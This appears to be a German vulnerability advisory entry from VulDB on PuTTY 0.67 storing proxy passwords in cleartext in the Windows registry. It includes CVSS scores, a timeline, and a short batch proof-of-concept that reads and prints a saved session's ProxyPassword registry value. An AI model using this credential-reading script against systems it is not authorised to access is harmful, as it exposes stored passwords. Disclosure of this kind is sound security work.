📚 PuTTY 0.67 Proxy Password Handler Cleartext schwache Verschlüsselung
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vuldb.com
Eine Schwachstelle wurde in PuTTY 0.67 entdeckt. Sie wurde als problematisch eingestuft. Dies betrifft eine unbekannte Funktion der Komponente Proxy Password Handler. Mittels Manipulieren mit einer unbekannten Eingabe kann eine schwache Verschlüsselung-Schwachstelle (Cleartext) ausgenutzt werden. Dies hat Einfluss auf die Vertraulichkeit.
Die Schwachstelle wurde am 20.11.2016 durch John Page (hyp3rlinx) als Putty Cleartext Password Storage in Form eines ungeprüften Mailinglist Posts (Bugtraq) herausgegeben. Auf seclists.org kann das Advisory eingesehen werden. Umgesetzt werden muss der Angriff lokal. Um eine Ausnutzung durchzusetzen, muss eine einfache Authentisierung umgesetzt werden. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt.
Ein öffentlicher Exploit wurde durch John Page in Batch umgesetzt und sofort nach dem Advisory veröffentlicht. Er wird als proof-of-concept gehandelt. Der Exploit kann von seclists.org heruntergeladen werden. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
@echo off setlocal ENABLEEXTENSIONS set /p v1=Enter Putty Saved Session: %1 echo Search registry for %v1% session Putty password? pause set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1% set VALUE_NAME=ProxyPassword FOR /F "tokens=1-3" %%A IN ('REG QUERY %KEY_NAME% /v %VALUE_NAME% 2^>nul') DO ( set ValueName=%%A set ValueType=%%B set ValueValue=%%C ) if defined ValueName ( @echo Value Name = %ValueName% @echo Value Type = %ValueType% @echo Value Password = %ValueValue% ) else ( @echo %KEY_NAME%\%VALUE_NAME% not found. ) set "v1="
Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.
CVSSv3
Base Score: 3.3 [?]Temp Score: 3.0 [?]
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:U/RC:R [?]
Zuverlässigkeit: High
CVSSv2
Base Score: 1.5 (CVSS2#AV:L/AC:M/Au:S/C:P/I:N/A:N) [?]Temp Score: 1.3 (CVSS2#E:POC/RL:U/RC:UR) [?]
Zuverlässigkeit: High
CPE
Exploiting
Klasse: Schwache VerschlüsselungLokal: Ja
Remote: Nein
Verfügbarkeit: Ja
Zugang: öffentlich
Status: Proof-of-Concept
Programmiersprache: Batch
Autor: John Page
Download: seclists.org
Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)
Gegenmassnahmen
Empfehlung: keine Massnahme bekanntStatus: Nicht verfügbar
0-Day Time: 0 Tage seit gefunden
Exploit Delay Time: 0 Tage seit bekannt
Timeline
20.11.2016 Advisory veröffentlicht20.11.2016 Exploit veröffentlicht
21.11.2016 VulDB Eintrag erstellt
21.11.2016 VulDB letzte Aktualisierung
Quellen
Advisory: Putty Cleartext Password StoragePerson: John Page (hyp3rlinx)
Status: Ungeprüft
Eintrag
Erstellt: 21.11.2016Eintrag: 77.8% komplett
...